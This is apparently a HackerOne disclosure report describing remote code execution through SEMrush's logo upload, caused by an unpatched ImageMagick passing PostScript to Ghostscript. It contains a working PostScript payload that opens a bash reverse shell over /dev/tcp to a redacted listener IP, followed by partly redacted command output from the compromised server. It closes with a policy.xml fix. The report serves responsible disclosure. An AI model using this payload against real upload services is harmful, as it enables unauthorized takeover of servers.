SEMrush: Remote Code Execution on www.semrush.com/my_reports on Logo upload

2018-08-31T12:48:47
ID H1:403417
Type hackerone
Reporter fransrosen
Modified 2019-06-24T16:57:38

Description

The Logo upload in the report constructor at: https://www.semrush.com/my_reports/constructor

{F340480}

is passed through a not properly patched version of ImageMagick. You can use Postscript to get Ghostscript to run which in return allows to trigger arbitrary commands on the server, leading to Remote Code Execution. Tavis Ormandy has also mentioned recently that the policy.xml needs to disable EPS,PS,PDF and XPS since all these have ways to trigger Ghostscript: http://openwall.com/lists/oss-security/2018/08/21/2

The following PoC-payload was used to get a reverse shell when issuing the upload:

Save it as test.jpg and upload it as an image for the logo:

%!PS userdict /setpagedevice undef legal { null restore } stopped { pop } if legal mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/███/8080 0>&1') currentdevice putdeviceprops

(█████ is the IP of my listener)

This resulted in:

``` █████████ ██████████ ls ███████ ██████████ app ████████ ██████████ ████ ████████ ██████ ███ █████████ ████████ ██████ █████████ █████████ █████ ██████████ █████ ██████ █████████ ███ █████ ██████ ████ █████ █████████ ███████ ████████ ███ ███

███ whoami ████ ███████ ██████ ```

At this point I wasn't sure if this was a third party or not, so I checked two things:

██████ to list files in the ██████ dir. It showed me:

█████████ ███ ████████ ████████ ███████ █████ ████ █████████ ████ ██████████

I navigated to

https://www.semrush.com/my_reports/████ https://www.semrush.com/my_reports/████████

And confirmed those two files exists in this directory.

/etc/hosts

This one confirmed it by:

cat /etc/hosts 127.0.0.1 localhost █████ ████.semrush.net ███ ████████ ███████

I'm certain this is a SEMrush-instance.

{F340481}

You should urgently make sure your policy.xml for imagemagick ONLY allows gif,jpg,png and nothing else.

Regards, Frans

Impact